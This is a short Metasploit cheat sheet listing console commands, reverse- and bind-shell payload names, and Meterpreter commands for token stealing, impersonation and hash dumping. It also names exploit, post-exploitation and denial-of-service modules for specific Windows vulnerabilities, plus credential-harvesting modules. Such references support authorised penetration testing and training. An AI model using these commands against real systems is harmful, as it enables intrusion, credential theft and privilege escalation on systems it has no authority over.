(1) Metasploit Commands (help: -h)
msfconsole, msfpayload, msfvenom, msfencode, msfupdate, db_connect, db_status, db_rebuild_cache, db_export, db_import, help, clear, exit, quit
search, use, set, setg, show, threads, run, exploit, rexploit, sessions, route
hosts, services, vulns, loot, notes, creds, resource
[...SNIP...]
(2) Msfpayload Lists (help: -h | list: -l)
Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]|s[O]>
windows/shell_reverse_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/meterpreter/reverse_tcp
linux/x86/shell_reverse_tcp
linux/x86/meterpreter/reverse_tcp
[...SNIP...]
(3) Meterpreter Commands (help: -h)
use, load, getuid, getsystem, hashdump, ps, shell, migrate, background, run
execute -H -f D:\\temp\\tmp\\Cookies\\csc.exe -a '/c whoami'
use incognito //Load the incognito extension (used to steal tokens on the target host or impersonate users)
list_tokens -u //List the user tokens available on the target host.
list_tokens -g //List the group tokens available on the target host.
impersonate_token "DOMAIN_NAME\\USERNAME" //Impersonate an available token on the target host.
steal_token PID //Steal the token of the given process and impersonate it.
drop_token //Stop impersonating the current token.
rev2self //Calls RevertToSelf() on the remote machine.
[...SNIP...]
(4) Metasploit Modules (show options)
exploit/multi/handler //Handler that receives the payload's connection
exploit/windows/smb/smb_login
exploit/windows/smb/psexec
exploit/windows/smb/ms08_067_netapi //MS08_067
exploit/windows/browser/ms12_004_midi //MS12_004
exploit/windows/local/ms_ndproxy //MS14_002
exploit/windows/local/ms14_058_track_popup_menu //MS14_058
auxiliary/dos/windows/rdp/ms12_020_maxchannelids //MS12_020 (RDP blue screen)
exploit/windows/browser/adobe_flash_pixel_bender_bof
post/multi/gather/lastpass_creds //Retrieve passwords saved in the host's browser
post/windows/manage/enable_support_account //Clone a system user account
auxiliary/admin/mssql/mssql_escalate_dbowner
post/windows/gather/smart_hashdump
References
exploit/windows/mysql/mysql_payload:
http://eromang.zataz.com/2011/03/10/oracle-mysql-udf-for-microsoft-windows-metasploit-payload-execution/
Hack ALL Security Features in Remote Windows 7 PC:
http://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc
